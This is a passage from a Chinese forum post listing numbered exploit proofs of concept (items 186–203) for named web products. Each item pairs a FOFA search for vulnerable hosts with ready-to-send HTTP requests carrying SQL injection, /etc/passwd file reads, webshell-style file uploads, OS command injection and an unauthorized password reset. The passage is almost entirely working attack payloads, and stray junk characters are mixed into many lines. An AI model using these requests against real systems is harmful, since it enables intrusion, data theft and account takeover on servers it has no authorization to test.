1 F4 E5 b0 }$ A3 N% v5 |version < 7.0.5.1
7 @1 t2 _/ B2 S4 s- @$ \FOFA:app="REALOR-天翼应用虚拟化系统": ?- j& D0 f$ `& j
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
4 H; O1 d' F! Z8 c r3 R$ K/ cHost: host Z2 X& S- I' m
9 x% @1 P3 w; P( P( B/ f& \7 ?
% g( M' ]! k( m4 S ` j; s( w186. F-logic DataCube3 SQL注入9 t: L7 M- S/ D
CVE-2024-31750% X) O7 Z% i* U4 ~
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统. ^/ R( T- y4 E8 O$ B3 @* I6 M
FOFA:title=="DataCube3"
/ e0 q& ^, {4 MPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1/ U/ e- N+ G# a8 P, f, `7 n, u
Host: your-ip
% S4 I" T/ ?6 ]# P+ ?2 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
: S5 C, `3 I2 P6 L% \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' y) U$ y; [5 p- b- \4 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 Z8 Q( X( D9 q+ F1 t# DAccept-Encoding: gzip, deflate
( X( c3 X3 W# Q3 t8 h* PConnection: close
; E6 R1 O' t( T; \ i6 RContent-Type: application/x-www-form-urlencoded
5 ?) ]' ^5 L7 \$ y# n. _
5 c5 a, z, O. y! ?req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
5 M8 }6 r- b3 c& G. T) Y2 B u
' H5 ]7 K. a# W3 F3 Z: u9 C0 L. b1 l5 ^
187. Mura CMS processAsyncObject SQL注入& f/ K; N6 S1 x% Z9 |. Y# B( u
CVE-2024-32640
8 ]4 l8 p [# J) sFOFA:"Mura CMS"
; u8 G, ^) }) L/ n# o' }POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
# k( [- ~' w; rHost: your-ip) M( _' H8 ^ p6 L' l
Content-Type: application/x-www-form-urlencoded
2 b' V( c$ g/ e8 z- O5 U% P' j( T
4 w$ i, S8 t2 a7 X0 g
! D/ i" y) v! t9 ^. K+ Jobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=19 X! Z0 \! M# O
- d1 n5 t5 M2 I, e6 S- H
1 |5 f! s* t, j: {8 p3 H
188. 叁体-佳会视频会议 attachment 任意文件读取
+ G* E) t! h7 m4 v7 @ Vversion <= 3.9.78 T6 k, v; c$ Z2 S) g7 h6 w& y
FOFA:body="/system/get_rtc_user_defined_info?site_id"2 P$ S" T6 o B+ m! A3 t8 Y" W
GET /attachment?file=/etc/passwd HTTP/1.1" v1 J6 H1 F( R# v( D8 ^( k! H
Host: your-ip: E7 E1 _, p8 _$ C$ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
# J( l) C8 f! P+ H( RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ ~9 c v- w# r: L. R8 f" w$ xAccept-Encoding: gzip, deflate
! J3 ]( e- Z0 W- e; Q/ rAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
4 E. V% ]/ R5 J& }+ f/ [. D" jConnection: close* l, M" r) l# \1 [0 p# r, C- v
# u" r1 i+ X, v/ I4 l. c8 q+ I, D
% O- C* M+ [/ }
189. 蓝网科技临床浏览系统 deleteStudy SQL注入6 W1 o! w* j4 Q' ~! @2 N' E& Q
FOFA:app="LANWON-临床浏览系统"
4 t6 o- O: ]1 d4 M" PGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
- {. f) J+ h; GHost: your-ip
/ N& M j5 t4 l. W. u% tUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.363 p7 a- y4 y# T9 [7 g3 l! e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 ^8 m$ l1 L' }5 H. G1 S8 d/ Y) K
Accept-Encoding: gzip, deflate
# N7 A5 l( ^/ s E, J3 B7 |. }Accept-Language: zh-CN,zh;q=0.94 e. p. M" Q- H# I! T5 d$ ~/ F2 i
Connection: close& y& U) `2 U( b8 l: E7 L0 L* ?
, D3 u; @2 y5 ~) S5 s7 g Y& p
1 X! I1 L, d4 c |" N5 `! ]190. 短视频矩阵营销系统 poihuoqu 任意文件读取
, w* j" o8 V" QFOFA:title=="短视频矩阵营销系统"
9 ^) P2 t6 L+ e% yPOST /index.php/admin/Userinfo/poihuoqu HTTP/2! U9 n/ \; L7 ]8 f8 t7 @+ ~
Host: your-ip! _6 E( [) G/ ]* V' M' S& v/ a! h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
# ]6 B& K' w9 ?0 ~7 k0 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
{& e3 z( |9 x0 d& X" e8 ?1 zContent-Type: application/x-www-form-urlencoded
; E; m+ X8 S0 f, jAccept-Encoding: gzip, deflate
% X) y7 K, U! a+ g9 Q2 S' oAccept-Language: zh-CN,zh;q=0.9
. Q7 R0 I4 Q8 R) j& `9 k' l8 ~) A2 H, T% M
poi=file:///etc/passwd
. L9 H# y8 L5 ~% ?" ^" c. G
4 ?" u) R6 h& s: P. N8 ]8 t. m$ A. }
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
9 w1 x' F9 G" O2 M* X) BFOFA:body="/CDGServer3/index.jsp"
7 }- n; h# P6 o9 N3 yPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
; g/ e- {8 s( k9 u ^* D5 |9 FHost: your-ip! k, z; i1 ^" @- \1 P. a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( x& P* G6 F' `$ g6 ?
Content-Type: application/x-www-form-urlencoded& V( G# s3 w% T$ ~8 _! G# |: h% V0 ^
! |& c; C$ K: W, f u9 G5 G
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
( @9 v7 X! d7 i! _ R% p
! r, i- n2 O- Z; z- z% T
8 m, C. m8 n7 c3 R8 L" q192. 富通天下外贸ERP UploadEmailAttr 任意文件上传8 j9 p$ S: j( r
FOFA:title="用户登录_富通天下外贸ERP"6 B& L2 A/ @1 X S7 p2 z7 P
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1- R; O+ e9 `+ c6 G% X
Host: your-ip7 ?9 }3 l* F3 V( d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.361 R. M& c! K" T" }/ e
Content-Type: application/x-www-form-urlencoded
' ]) ~: O( E7 b" x. Q% |/ t' |0 U' Q; |5 u2 Q4 _
' v/ F5 P/ q% V. z* G7 T% I9 A<% @ webhandler language="C#" class="AverageHandler" %>
9 U: q9 X9 U& l) {7 dusing System;
1 S. ^! ]! a/ w; @% i+ j. U. ausing System.Web;) |/ Q6 n4 `# I' r- J
public class AverageHandler : IHttpHandler
: ?% L/ g, w+ V" p* A% B( b{
/ O9 b/ a( g }% }4 g: upublic bool IsReusable) U5 Q. @7 h7 d1 F/ t7 B
{ get { return true; } }
" j8 M1 x- u; D% spublic void ProcessRequest(HttpContext ctx) @( N* N5 ~, P* z- ]6 y* N
{
& _2 n, K' r% u: c" ^ H+ Nctx.Response.Write("test");( d! q& Y( M) T( S7 k, v1 o0 T
}
$ a7 r, X: h, k1 q7 H" J0 L}
* B) P: M% n1 E+ ^. D
* ?% ~1 S! T/ }; W7 I7 {1 [% Q$ S- q. j5 r' I4 @' I
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行& X5 t5 d/ F2 T+ Y7 ]& [) B
FOFA:body="山石云鉴主机安全管理系统") L2 [. J7 i m' F
GET /master/ajaxActions/getTokenAction.php HTTP/1.1+ G9 j& _9 \0 ~, m8 M; J$ w; ]. s
Host:! V3 x9 `& f5 S8 N' X
Cookie: PHPSESSID=2333333333333;+ a h1 F! d+ E. |6 ^
Content-Type: application/x-www-form-urlencoded
* k# Z9 r% [+ H L' W; s) C! s- X$ C* v$ [User-Agent: Mozilla/5.0
6 g. F' a; Q# M) i+ u8 t( M- e- H7 m; a6 Q4 x ^3 C
. l* x, ]: g3 W8 n/ CPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.11 ]. n2 s1 m' J' H: {
Host:
8 Z: g" R5 J) V8 s, |% K3 FUser-Agent: Mozilla/5.0! D. C3 b5 O' N# Q( |1 n; l5 o
Accept-Encoding: gzip, deflate
* C2 D3 N+ ]; S) pAccept: */*
9 q7 _) S0 j5 p& cConnection: close
' t. F9 S& i o. qCookie: PHPSESSID=2333333333333;
8 q+ Y4 A+ |8 k; {9 j( H% X0 lContent-Type: application/x-www-form-urlencoded+ R4 @# s' b; q O3 |
Content-Length: 84
: g; w8 l: F' @, P7 H! y3 P! W/ c5 {* {$ G* V& y% R& ~+ s2 L8 J$ ] C3 F
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')) W. u, k' Z! Z, M
; s2 O0 ]4 c/ o6 a6 F P; p% ?+ I0 K# p4 S4 n. g* |6 p
GET /master/img/config HTTP/1.1* s1 m: [/ R8 \. G; C3 ~& B+ D
Host:
3 Y" V+ A! `. v8 N" Y+ f! K/ |User-Agent: Mozilla/5.0
0 J9 F6 g' V# g1 [7 l! g+ W% }& c; k% }7 ]. B
, y0 z4 O# H* T7 g4 T5 n! M# A
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传5 s1 X1 P) m4 U. C1 U$ k) `3 w+ |
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在; v6 G) S9 {! T
0 v0 ? D/ K, N+ M$ A/ z* fPOST /servlet/uploadAttachmentServlet HTTP/1.13 j# c# [$ W+ }
Host: host
3 F7 Z: r$ A/ b W1 l' U- B4 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.363 R H* p& m; P) n4 w# s3 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ L5 w: o N3 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- m, M0 p- r* HAccept-Encoding: gzip, deflate
2 e% ^3 A0 V0 s! l' d- aConnection: close) v+ Q0 e' X/ u$ p) ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk: k! w7 D$ V. o/ T
------WebKitFormBoundaryKNt0t4vBe8cX9rZk: L d, Y, Z% W2 a
0 N; p) z( h- ?) \* H& sContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
& G+ F9 [' L) [8 g' m) QContent-Type: text/plain1 |( K9 u1 B) R5 ~/ t. g
<% out.println("hello");%>
3 t! p G+ V2 k M0 f8 w. S6 C------WebKitFormBoundaryKNt0t4vBe8cX9rZk
' c0 E2 J ~/ I7 x7 s; zContent-Disposition: form-data; name="json"
& V: Q% O, n r' G9 [7 ^ {"iq":{"query":{"UpdateType":"mail"}}}4 L+ K/ \2 r$ f1 V, w5 \
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
& e! e9 l. W; u8 n: h' G
, s# d5 ~4 ]& G+ s; y) O1 j+ A+ v% n+ J! P% s
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行& ~' g! J8 d- B0 N5 z( o
FOFA:title=="飞鱼星企业级智能上网行为管理系统
# u5 G* g+ T4 k; u( m; g* G+ Z, k. }" dPOST /send_order.cgi?parameter=operation HTTP/1.1, H) t. @, A9 {% H; S
Host: 127.0.0.1+ {; ~: \& {2 m7 }# J
Pragma: no-cache
1 C+ T/ W4 S \# Q4 _6 wCache-Control: no-cache0 }3 \8 n$ }; \3 }/ L( j8 ? x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 p. I9 p, i. w) W5 A1 l$ F( i, iAccept: */*( j, G% P; ~, `0 u" A4 }) I( o
Accept-Encoding: gzip, deflate+ V! y) T4 B& M, Q
Accept-Language: zh-CN,zh;q=0.9; g! e* N! h* e+ {7 s5 _9 s5 P
Connection: close: [4 w$ w/ N# z9 V) r4 Q6 k$ m
Content-Type: application/x-www-form-urlencoded6 W: J# i. v8 c q* p
Content-Length: 68# a5 b! U! E0 J9 s9 T
: r9 o* u# s! ~4 P, r' p
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
- ]1 B, d$ t8 z" W/ K3 h6 R; j5 W7 h0 \( D0 n+ p9 B
% ~7 y. o) k8 o ~
196. 河南省风速科技统一认证平台密码重置% r8 |" U3 p8 G+ U; E& F1 m
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"+ ^/ N! r6 F! R& M. Q& K5 i, W
POST /cas/userCtl/resetPasswordBySuper HTTP/1.13 i) h# {/ V$ m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 z5 R1 |. b7 W6 w, q4 i0 N! h8 I p4 o2 ^
Content-Type: application/json;charset=UTF-87 k `5 u8 G0 y4 W- Y
X-Requested-With: XMLHttpRequest. l7 }) \) `6 h" X% k
Host:9 z) H% I5 B( b1 w( O! O- {
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.23 V9 e: J/ L, z$ I
Content-Length: 45
8 Q# ? p- N' l8 b# n( rConnection: close
+ X- J) B- S% k" F7 I
& B. W& `8 {+ R$ P4 _1 u! {{"xgh":"test","newPass":"test666","email":""}( K% @1 b2 P i0 m6 v
; p/ P' q6 B; r1 j
2 P ]$ j0 F& s* b- ^) C f7 g& q2 l( k4 C: W' W9 j; m* M) F" G& |! K
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入6 K' ^8 Y1 J& `% f9 l
FOFA:app="浙大恩特客户资源管理系统") R* C% C9 o* y. y# E6 _. w/ W
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
: N+ l5 H! |1 {( [0 s3 \) OHost:, c: \+ I5 K' ?2 t3 n2 R) k! `# k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36/ X2 r- W& H% ?" R0 ~/ @$ S
Accept-Encoding: gzip, deflate' Z" L% u3 }$ W2 s* ^0 K
Connection: close6 [+ m. v( U8 f) ]0 }; r
7 S* ~7 K! v0 b9 U
' W/ k' u- Y0 }( H1 V$ E) n
3 j" m* d1 p/ R1 o9 w/ k198. 阿里云盘 WebDAV 命令注入7 Q* Y7 j8 g2 r" j; I. _2 Z. x
CVE-2024-296407 p- E7 w0 |: N' I+ u
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1+ S) b! w5 y \, k. L( M
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64 f3 F" _. G" I
Accept: */*
" p: I! d1 ^3 R# W3 Z r+ o0 T3 Q1 E WAccept-Encoding: gzip, deflate
' m. d9 F, v1 BAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
" f9 P- N5 Z' |/ H$ N R1 bConnection: close# e/ n+ z' l" x( H7 b% c
6 \- z0 Z/ b% e1 V& U
- w9 k9 ^4 d$ x199. cockpit系统assetsmanager_upload接口 文件上传
+ e" z( t: ^2 X/ r: A! L* M
! |4 p# j, ?# E2 [4 K! S1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:0 \+ X" d5 r8 k- M
GET /auth/login?to=/ HTTP/1.1" j$ F! v7 ^: `. v1 w7 C/ q
6 M8 \6 g* r" u& _0 J响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"0 v, w T- E9 e% w; z% W
7 [$ W5 F* h3 x8 Y1 O. U
2.使用刚才上一步获取到的jwt获取cookie:0 l+ } o7 P8 ~& ~! C, R
' g5 `/ h- e$ TPOST /auth/check HTTP/1.1; d, G/ k e$ D* U) {
Content-Type: application/json' A5 [, y3 y! \3 Y* G( `
" c2 L, n' R; `8 ?# Y( G{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
! a: O+ O# ^* i' r N* U
. d# g& s6 b3 ]) t7 l: t响应:200,返回值:
6 K" j! N# M5 Y( YSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
2 E! ]8 a' _& S. u- I' lFofa:title="Authenticate Please!"4 i. D7 L7 {$ J" W3 ?4 K
POST /assetsmanager/upload HTTP/1.13 D* p) H( D4 H6 w$ d( G3 h
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3! |; j( e; G2 q1 x7 k4 e3 s0 ?
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
$ ], q+ }5 ~3 `: B$ \7 y
# d" [; o$ P( \* b-----------------------------36D28FBc36bd6feE7Fb3
/ U) y" O% q6 o g$ E% ^' f% SContent-Disposition: form-data; name="files[]"; filename="tttt.php"
. T$ Z2 ~, H$ E0 z) `8 w' PContent-Type: text/php; b" K9 Q8 e! w4 W3 @4 D: @8 n4 V" F
. B1 k( K+ q& Y9 C; O! m& ?<?php echo "tttt";unlink(__FILE__);?>; ]% v/ _! l- w; k! |5 O' [
-----------------------------36D28FBc36bd6feE7Fb3
7 z$ V1 L7 C8 ]Content-Disposition: form-data; name="folder"
; S- p: C2 C( c$ e6 V' R$ s3 E
-----------------------------36D28FBc36bd6feE7Fb3--
7 C$ h% {4 }1 k7 e5 {! |8 Q* D- \* _& v8 b- o9 M9 J
/ a: A5 F( ]7 U5 I# D/storage/uploads/tttt.php
$ g Z# I5 M5 g* b9 m$ u
" O4 y0 r; ], K% n3 q% e( ~1 C3 Q5 u200. SeaCMS海洋影视管理系统dmku SQL注入
9 W8 _1 x i% z6 oFOFA:app="海洋CMS"8 a, K* u* |8 f0 E( [# ~* M
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
# J7 _0 E& h$ sCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s$ u/ w. {& \ ]5 m
Upgrade-Insecure-Requests: 15 A6 S: c9 k7 x. L4 F3 Q5 I- o# M
Cache-Control: max-age=0
9 {: c, m3 v. k& O5 Z, `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# F& L0 |* s2 _9 j' T& P
Accept-Encoding: gzip, deflate
; m# c/ H0 E# @4 G/ R% V- b1 xAccept-Language: zh-CN,zh;q=0.95 h. e+ f/ K+ L* J
2 R/ r D) X" n/ l9 g! X& [, X: _" `9 j- W$ U$ R) |0 G
201. 方正全媒体新闻采编系统 binary SQL注入
1 _, @4 K5 U# mFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
4 o9 S. z. F- u) kPOST /newsedit/newsplan/task/binary.do HTTP/1.1
* v- q& q* g0 T- |4 K3 a3 ?Content-Type: application/x-www-form-urlencoded r2 k8 q& W* b5 P* Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( t' y; D* J- r- c2 _' fAccept-Encoding: gzip, deflate9 v( @3 G2 W. o- o% {3 `4 C
Accept-Language: zh-CN,zh;q=0.9
' d3 h& [5 _/ b! Q/ T0 ^Connection: close' s9 n, a* `: d& S' D2 y" B! N
) K5 `& T5 z; k' t RTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
/ f1 h/ x$ n5 j2 I1 i8 K
$ \. Q" B, w; E5 v9 H7 V" t* m
6 n7 {4 k8 z4 |0 U202. 微擎系统 AccountEdit任意文件上传, e; {; M9 |; J
FOFA:body="/Widgets/WidgetCollection/"1 g' x* T4 j9 h% I+ D+ a
获取__VIEWSTATE和__EVENTVALIDATION值
( `+ P& f' d( p$ K9 CGET /User/AccountEdit.aspx HTTP/1.1
2 A6 |& @3 ]- p5 m0 p1 LHost: 滑板人之家0 P5 u$ \- d/ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.315 t0 C' l8 Q5 @+ p- e1 ] s- ]
Content-Length: 05 ? @% J. L: a0 @
1 {5 F" b) W. F3 j& v. [$ D$ Z* E
/ n! o' W+ X O3 A% @. Q# l* s替换__VIEWSTATE和__EVENTVALIDATION值; t0 F4 Y$ u8 \1 |/ |+ j$ F3 n. Z
POST /User/AccountEdit.aspx HTTP/1.1
, N7 [0 h7 B9 l& i7 QAccept-Encoding: gzip, deflate, br
& `8 u* c3 W( ~+ c9 J+ jContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
6 b! j& y7 O* m3 S( o; n' H/ l1 Z u
-----------------------------786435874t38587593865736587346567358735687
! {2 b6 T; t, \$ p" u5 }Content-Disposition: form-data; name="__VIEWSTATE"& G8 V5 q: ~8 }) b
6 I0 x; p$ e$ ^- i9 _& W1 O__VIEWSTATE: _2 A" m: V3 M/ i* d( P
-----------------------------786435874t38587593865736587346567358735687
/ M3 u2 [& r2 [" W8 `Content-Disposition: form-data; name="__EVENTVALIDATION", e' m9 P( \: u+ c% \4 o2 h
$ J; p; T. u& P7 C x3 C
__EVENTVALIDATION/ P5 g- }; P9 k& e$ p5 P
-----------------------------786435874t38587593865736587346567358735687/ }* y/ }! y. K* u6 o
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
9 r( V6 p/ }: @0 r- q# BContent-Type: text/plain
) j6 R- c* j9 |. g
! h+ V; k6 t, G- qHello World!
4 i/ d1 A# I+ R& a-----------------------------786435874t385875938657365873465673587356879 M: m1 B" |8 o$ A+ A6 z* M/ E
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"7 X; h, u- H7 o# j# I- M% w
2 l2 E( a. R8 w+ o% u
上传图片$ @' J; `2 E* G0 ~
-----------------------------786435874t38587593865736587346567358735687
/ r. s Z9 V# {+ e+ k: k: V' z& ?; ]: fContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
; E- x& \( }, @) ^, r5 ~- o6 J& c* u- [/ d- c3 i
6 y! w4 o4 G9 B* V1 X* j3 O-----------------------------786435874t38587593865736587346567358735687
a3 A1 O+ x0 `% z+ w+ N6 i! LContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
, X) F7 Y% l8 ~2 a1 d( g9 \" a
, `7 d* ]% h9 X3 u; w0 U) |% [! L0 I' ?3 h
-----------------------------786435874t38587593865736587346567358735687--
) u4 d! T" f1 ?8 I9 c+ k. [3 J/ B' f
) X. X* h7 k" J; y2 Z& k/_data/Uploads/1123.txt
8 `' \' g' U: Y( |7 G9 _2 c: f4 \ ~5 @6 V! v, g( J
203. 红海云EHR PtFjk 文件上传
: K3 ?/ k% B+ F- s* U) x, Y4 P, NFOFA:body="RedseaPlatform"# a# `& G! T$ _3 U) O
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.10 ~$ p& Z6 T( D& H+ E6 t
Host: x.x.x.x
/ M7 h. N$ h sAccept-Encoding: gzip7 N3 z* J! ^& L( L8 T! i5 E6 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; |1 u" L" J( u" n# j8 X; i: I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4% x1 f( ]$ w: g
Content-Length: 210
3 Q: A( e R/ E8 _
& J4 ^9 j' V( M1 Q- M------WebKitFormBoundaryt7WbDl1tXogoZys4" b5 s) j2 c* y( a) Z
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"5 G8 \& ~- v5 @5 q( J& {
Content-Type:image/jpeg
( ^# o+ X( x2 }3 a( i* j, a9 f, \0 N# N
+ L% Q% g4 d5 i, o4 o<% out.print("hello,eHR");%>
2 k$ B; j* y9 x% ^------WebKitFormBoundaryt7WbDl1tXogoZys4--
( g K# m, ?) N, k8 _" T. j2 c1 C& b3 X+ d1 `9 }
) t* U; Q4 V% s; g; v/ s0 v' b
0 C' {4 K+ a2 `& V6 J- J
) D9 f& [$ Z$ n2 J: H. {* c7 u( O) }5 n/ c. E7 [
8 O2 w' `5 k& f a: j, K
|
发表于 2024-6-5 14:31:29
收藏
支持
反对